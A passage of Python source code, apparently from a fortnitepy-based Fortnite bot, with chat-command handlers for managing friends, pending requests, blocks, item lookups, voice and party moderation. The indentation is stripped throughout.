except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
text += f'\n{name(user)}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
friend = client.get_friend(user.id)
if not friend:
return
if not friend.nickname:
text += f'\n{str(friend.display_name)} / {friend.id}'
else:
text += f'\n{friend.nickname}({str(friend.display_name)}) / {friend.id}'
if friend.last_presence and friend.last_presence.avatar:
text += f"\n{l('avatar')}: {friend.last_presence.avatar.asset}"
if friend.last_logout:
text += "\n{1}: {0.year}/{0.month}/{0.day} {0.hour}:{0.minute}:{0.second}".format(friend.last_logout, l('lastlogin'))
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
pending = client.get_pending_friend(user.id)
if not pending:
return
text += f'\n{str(pending.display_name)} / {pending.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['getblock']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['getblock']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
text = str()
for user in users.values():
block = client.get_blocked_user(user.id)
if not block:
return
text += f'\n{str(block.display_name)} / {block.id}'
send(display_name,text)
await reply(message, client, text)
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['info']:
try:
if args[1] in commands['info_party']:
text = str()
text += f"{client.party.id}\n{l('member_count')}: {client.party.member_count}\n{client.party.playlist_info[0]}"
for member in client.party.members:
client.add_cache(member)
if data['loglevel'] == 'normal':
text += f'\n{str(member.display_name)}'
else:
text += f'\n{str(member.display_name)} / {member.id}'
send(display_name,text)
await reply(message, client, text)
if data['loglevel'] == 'debug':
send(display_name,json.dumps(client.party.meta.schema,indent=4),yellow,add_d=lambda x:f'```\n{x}\n```')
elif True in [args[1] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")]:
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
elif True in [args[1] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")]:
type_ = convert_to_type(args[1])
if rawcontent2 == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent2, type_)
if not result and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent2, type_)
if not result:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
await reply(message, client, f"{convert_backend_type(result[0]['backendType'])}: {result[0]['name']} | {result[0]['id']}\n{result[0]['description']}\n{result[0]['rarity']}\n{result[0]['set']}")
else:
text = str()
for count, item in enumerate(result):
text += f"\n{count+1} {convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_show_info')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
await reply(message, client, f"{convert_backend_type(item['backendType'])}: {item['name']} | {item['id']}\n{item['description']}\n{item['rarity']}\n{item['set']}")""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['info']}] [[{commands['info_party']}] / [{commands['item']}] / [{commands['id']}] / [{commands['outfit']}] / [{commands['backpack']}] / [{commands['pickaxe']}] / [{commands['emote']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['pending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.incoming:
pendings.append(pending)
if args[1] in commands['true']:
for pending in pendings:
try:
await pending.accept()
await reply(message, client, l('add_friend', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[1] in commands['false']:
for pending in pendings:
try:
await pending.decline()
await reply(message, client, l('friend_request_decline', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['pending']}] [[{commands['true']}] / [{commands['false']}]]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removepending']:
try:
pendings = []
for pending in client.pending_friends:
client.add_cache(pending)
if pending.outgoing:
pendings.append(pending)
for pending in pendings:
try:
await pending.cancel()
await reply(message, client, l('remove_pending', f'{str(pending.display_name)} / {pending.id}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friendrequest'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['addfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache( user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.has_friend(user.id):
await reply(message, client, l('already_friend'))
return
await client.add_friend(user.id)
await reply(message, client, l('friend_request_to', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_send_friendrequest')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_sending_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removefriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['removefriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.has_friend(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.has_friend(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.has_friend(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.has_friend(user.id):
await reply(message, client, l('not_friend_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('remove_friend', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend')""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_remove_friend')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['removeallfriend']:
try:
friend_count = len(client.friends)
await client.remove_all_friends()
await reply(message, client, l('remove_allfriend',friend_count))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except Exception:
send(name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['remove_offline_for']:
try:
kwargs = {}
kwargs["days"] = int(args[1])
kwargs["hours"] = int(args[2]) if args[2:3] else 0
kwargs["minutes"] = int(args[3]) if args[3:4] else 0
offline_for = datetime.timedelta(**kwargs)
utcnow = datetime.datetime.utcnow()
event = asyncio.Event(loop=loop)
removed = []
async def _(friend: fortnitepy.Friend):
last_logout = None
if friend.last_logout:
last_logout = friend.last_logout
elif friend.created_at > client.booted_utc:
last_logout = await friend.fetch_last_logout()
if last_logout and ((utcnow - last_logout) > offline_for):
if event.is_set():
await event.wait()
try:
await friend.remove()
except fortnitepy.HTTPException as e:
if e.message_code != "errors.com.epicgames.common.throttled":
raise
if "Operation access is limited by throttling policy" not in e.message:
raise
event.set()
await asyncio.sleep(int(e.message_vars[0]) + 1)
await friend.remove()
event.clear()
removed.append(friend)
max_worker = 5
worker = 0
def dec(*args):
nonlocal worker
worker -= 1
tasks = []
val = len(client.friends)
for num,friend in enumerate(client.friends):
if worker >= max_worker:
await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED)
worker += 1
task = loop.create_task(_(friend))
task.add_done_callback(dec)
tasks.append(task)
await asyncio.gather(*tasks)
await reply(message, client, l('remove_allfriend',len(removed)))
await asyncio.sleep(2)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_removing_friend'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['remove_offline_for']}] [{l('day')}] [{l('hour')}]({l('optional')}) [{l('minute')}]({l('optional')})")
except Exception:
send(name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['acceptpending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['acceptpending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('not_pending_with_user'))
return
await client.accept_friend(user.id)
await reply(message, client, l('friend_add', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_accept_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_accepting_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['declinepending']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['declinepending']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_pending(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_pending(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_pending(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_pending(user.id):
await reply(message, client, l('nor_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_pending(user.id):
await reply(message, client, l('nor_pending_with_user'))
return
await client.remove_or_decline_friend(user.id)
await reply(message, client, l('friend_request_decline', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_decline_pending')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_declining_friendrequest'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['blockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_block_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unblockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['unblockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_unblock_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['voice']:
try:
if args[1] in commands['true']:
client.voice = True
await client.enable_voice()
send(display_name,l('set_to', 'voice', l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('on')))
elif args[1] in commands['false']:
client.voice = False
await client.disable_voice()
send(display_name,l('set_to', 'voice', l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[0] in commands['chatban']:
try:
reason = rawcontent.split(' : ')
if rawcontent == '':
await reply(message, client, f"[{commands['chatban']}] [{l('name_or_id')}] : [{l('reason')}({l('optional')})]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))""" for user in users.values()
],
"variable": [
{"user": user, "reason": reason} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_chatban')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['promote']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['promote']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_promote_user')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
